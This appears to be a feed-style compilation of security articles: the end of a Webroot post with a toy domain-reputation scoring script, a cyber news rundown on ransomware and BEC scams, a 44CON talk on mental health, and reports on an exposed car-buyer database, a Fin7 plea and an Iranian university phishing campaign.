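# Hypothetical weights (not Webroot's model): each quiet month of registration
# history counts as one benign observation, capped at five years, and one
# malicious verdict outweighs ten benign ones.
MONTHS_CAP = 60
MALICIOUS_WEIGHT = 10

@dataclass
class DomainHistory:
    domain: str
    registered: date
    benign: int      # observations where the domain served only benign content
    malicious: int   # observations where it served phishing or malware

def reputation_score(h: DomainHistory, today: date) -> int:
    """0..100; higher means the domain is more likely to stay benign."""
    quiet_months = min(max((today - h.registered).days, 0) // 30, MONTHS_CAP)
    benign_total = h.benign + quiet_months
    malicious_weighted = h.malicious * MALICIOUS_WEIGHT
    # Laplace-smoothed estimate: a never-seen domain sits at 50, not at 0 or 100
    p_benign = (benign_total + 1) / (benign_total + malicious_weighted + 2)
    return round(100 * p_benign)

def policy(score: int) -> str:
    """Map a score onto an organisation's risk appetite (thresholds assumed)."""
    if score >= 80:
        return "allow"
    if score >= 40:
        return "monitor"
    return "block"

# Constructed sample histories, evaluated on a fixed date so results are stable
TODAY = date(2019, 9, 20)
SAMPLES = [
    DomainHistory("long-lived.example", date(1997, 9, 15), benign=5000, malicious=0),
    DomainHistory("registered-last-week.example", date(2019, 9, 10), benign=0, malicious=0),
    DomainHistory("new-and-already-phishing.example", date(2019, 9, 10), benign=0, malicious=2),
    DomainHistory("old-but-repeat-offender.example", date(2014, 1, 1), benign=20, malicious=30),
]

def evaluate(samples=SAMPLES, today=TODAY):
    """Return {domain: (score, policy)} for every sample history."""
    return {s.domain: (reputation_score(s, today), policy(reputation_score(s, today)))
            for s in samples}

if __name__ == "__main__":
    for domain, (score, verdict) in evaluate().items():
        print(f"{domain:36} score={score:3}  policy={verdict}")
```

A freshly registered domain with no history lands on "monitor" rather than "block", while a single malicious verdict on a young domain drops it straight to "block"; the thresholds are where an organisation's own risk appetite is expressed.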

For more information on why context is critical to actionable threat intelligence, click here.

Designing how you classify and apply the data

Finally, how a threat intelligence provider classifies data and the options they offer partners and users in terms of how to apply it can greatly increase its utility. Protecting networks, homes, and devices from internet threats is one thing, and certainly desirable for any threat intelligence feed, but that’s far from all it can do.

Technology vendors designing a parental control product, for instance, need threat intelligence capable of classifying content based on its appropriateness for children. And any parent knows malware isn’t the only thing children should be shielded from. Categories like adult content, gambling sites, or hubs for pirating legitimate media may also be worth avoiding. This flexibility extends to the workplace, too, where peer-to-peer streaming and social media sites can affect worker productivity and slow network speeds, not to mention introduce regulatory compliance concerns. Being able to classify internet objects with such scalpel-like precision makes thoughtfully designed threat intelligence much more useful for the partners leveraging it.

The speed at which new threat intelligence findings are applied to all endpoints is also critical. It’s well-known that static threat lists can’t keep up with the pace of today’s malware, but updating those lists on a daily basis isn’t cutting it anymore either. The time from initial detection to global protection must be a matter of minutes.

This brings us back to where we started: the need for a robust, geographically diverse data set from which to draw our threat intelligence. For more information on how the Webroot Platform draws its data to protect customers and vendor partners around the globe, visit our threat intelligence page.

The post Thoughtful Design in the Age of Cybersecurity AI appeared first on Webroot Blog.

Cyber News Rundown: Arizona School Ransomware Attack


Ransomware Closes Arizona School District

As many students began returning for the fall semester, classes were cancelled in the Flagstaff Unified School District in Arizona after a ransomware attack disabled some of the district’s computer systems. Officials haven’t yet released any additional information on the ransom demanded or on whether any sensitive employee or student documents were compromised. The attack is another in a chain of ransomware campaigns affecting dozens of school districts around the country in recent months.

BEC Scam Targets Toyota Corporation

A subsidiary company of Toyota fell victim to a business email compromise (BEC) that could cost more than $37 million. Using social engineering to convince the victim to send the wire transfer has become a common practice around the world and earned scammers an estimated $1.3 billion in 2018 alone. Officials are still working to determine the proper course of action to recover the stolen funds, though it is unlikely they will be able to track down their present location.

International BEC Sting Nets 281 Arrests

With the cooperation of many law enforcement agencies around the world, at least 281 individuals were taken into custody for their roles in various BEC scams. Along with the arrests, officials seized $3.7 million in cash that had been stolen by redirecting wire transfers while posing as a high-level executive. While the majority of arrests came from Europe and Africa, nearly a quarter occurred in the U.S.

LokiBot Campaign Affects U.S. Manufacturer

A poorly written email phishing campaign was recently discovered with a rather malicious payload called LokiBot. In the scam, once a victim opened the attachment (with assurances in the email that it simply needed to be reviewed), an archive would unzip and allow the payload to begin hunting for credentials and any other sensitive information stored on the system. After reviewing the LokiBot sample, researchers tied the IP address from which the campaign originated to several other, similar campaigns from recent months.

Oklahoma State Trooper Pension Fund Stolen

Malicious hackers recently stole more than $4.2 million from the Oklahoma State Troopers’ pension fund, which was to be used to assist roughly 1,500 retired law enforcement agents in the state. While most of the benefits programs should remain unaffected, officials are confident that they will be able to recover the funds, which would be covered by the insurance company if they cannot be recovered.

The post Cyber News Rundown: Arizona School Ransomware Attack appeared first on Webroot Blog.

#44CON: Establishing a Mental Health Toolbox

Noting the warning lights to assess your levels of stress and mental health now, and in the future, can save a lot of anguish in your working life.

Speaking at 44CON in London on the issue of dealing with mental health, Duo Security CISO advisory group member J Wolfgang Goerlich recommended a strategy of a “career owners manual” and knowing what to do to “make sure you have got a career and what you’re doing well.”

He recommended having the right state of health to be able to thrive in what he called a “good community,” where we need to be supportive of others, as “a lot of us struggle.”

Goerlich advised taking a back seat, stepping back from work for a few months and to avoid being afraid of duplicating work.

When looking at yourself in a current position, he recommended taking the following steps:

  • Look at how your culture fits the company culture. Are we happy with the people in our organization “and do they make us feel good?”
  • Are our values reflected in theirs, and do we feel good about ourselves when we look in the mirror or do we feel like we are compromising ourselves?
  • Are the tasks we are doing good?
  • Is diversity good where we work, as diversity brings different perspectives and points of view?

“You need to be sure the inputs line up, as different companies have different values” he said, as if we are unhappy, it is too easy to ignore warning lights around our mental health, and it is too easy to take a “teenager’s action” as they ignore warning lights on a car. These warning lights should be around:

  • Physiological effects
  • Non-competitive compensation
  • Lack of training
  • Lack of career path
  • Poor teamwork
  • Poor leadership
  • No appreciation or recognition
  • Misaligned values and culture

In terms of tools, Goerlich recommended relaxing, recharging and re-learning, and doing “what is good for you.” This included time off work, what Goerlich called “zero days,” to recharge. The steps to take to recharge are as follows:

Weekly: prepare for the week ahead, do the “basic things,” de-stress and energize, and review the previous week.

Monthly: review stress, check warning lights, and schedule “zero days.”

Quarterly: check your health, review accomplishments, review learning, plan for next quarter, and schedule time off.

Annually: annual job reviews, and annually review your job.

Decade: assess who you are now, what you enjoy now, and where the job market is going.

“Make sure you have got the tools in your toolbox and are doing maintenance on your career,” he concluded. “This [cybersecurity] is a fantastic career and industry, but we see too many people struggle.”

Marketer Exposes 198 Million Car Buyer Records

Another unprotected Elasticsearch database has been discovered by researchers, this time exposing personally identifiable information (PII) linked to 198 million car buying records.

The privacy snafu was discovered back in August by Jeremiah Fowler, researcher at SecurityDiscovery.

The non-password protected database contained a massive 413GB of data on potential car buyers, including names, email addresses, phone numbers, home addresses and more stored in plain text.

Also left publicly accessible were IP addresses, ports, pathways, and storage info “that cyber-criminals could exploit to access deeper into the network,” he explained.

Fowler spent several days trying to locate the owner of the database, which contained information from multiple websites.

“Only by manually reviewing multiple domains did I discover that they all linked back to dealerleads.com,” he added. “I was able to speak with the general sales manager who was concerned and professional with getting the information secured and public access was closed shortly after my notification by phone.”

As the name suggests, Dealer Leads provides online marketing support in the form of prospective car buyers for dealerships around the US. It's unknown how long the data was exposed for.

“It is unclear if Dealer Leads has notified individuals, dealerships, or authorities about the data incident. Because of the size and scope of the network applicants and potential customers may not know if their data was exposed,” Fowler warned.

“Also, when contacting a local dealership in their hometown about a specific automobile they may not have known that the website actually collected their data as a lead or that this data could potentially be stored, saved, sold, or shared via DealerLeads.”

The incident is just the latest in a long line of privacy leaks via Elasticsearch, AWS S3, and other online platforms, due to security misconfigurations.

In recent months, Honda exposed 134 million company documents, a leading Chinese uni leaked 8TB of email metadata, and Dow Jones left a sensitive global watchlist of criminals and terrorists open to the public — all via misconfigured Elasticsearch instances.

Fin7 sysadmin pleads guilty to running IT for billion-dollar crime syndicate

Fedir Oleksiyovich Hladyr is the first member of the infamous cybercrime network to be found guilty of hacking-related crimes in a US court.

Iranian Threat Group Targets 380 Global Universities

An Iranian threat group exposed last year has been detected targeting hundreds of universities in over 30 countries in a global phishing operation.

Cobalt Dickens has been linked to indictments last year against nine Iranian nationals who worked for the Mabna Institute. They allegedly stole more than 31TB of data from over 140 US universities, 30 US companies and five government agencies, alongside more than 176 universities in 21 other countries.

The Secureworks Counter Threat Unit (CTU) this week claimed the group's activity has not declined despite the publicity given to the indictments; in fact, it discovered a new campaign similar to the group's August 2018 phishing raids, using free online services and publicly available tools.

Specifically, the group uses compromised university resources to send spoofed library-themed emails containing links to log-in pages designed to harvest user credentials.

Some 20 new domains were registered in Australia, the United States, the United Kingdom, Canada, Hong Kong, and Switzerland using the Freenom domain provider. Many use valid SSL certificates issued by Let’s Encrypt to add further authenticity to the phishing campaigns.

Continuing the theme of using publicly available resources to carry out these attacks, the group utilized the SingleFile plugin available on GitHub and the free HTTrack Website Copier standalone application to copy the login pages of targeted university resources, according to Secureworks.

The researchers claimed that metadata in the spoofed web pages indicates the attackers are of Iranian origin. At least 380 universities worldwide have apparently been targeted in this latest campaign.

“Some educational institutions have implemented multi-factor authentication (MFA) to specifically address this threat,” it concluded.

“While implementing additional security controls like MFA could seem burdensome in environments that value user flexibility and innovation, single-password accounts are insecure. CTU researchers recommend that all organizations protect Internet-facing resources with MFA to mitigate credential-focused threats.”

Universities are an increasingly popular target for nation state attackers looking for highly sensitive research to advance homegrown development programs.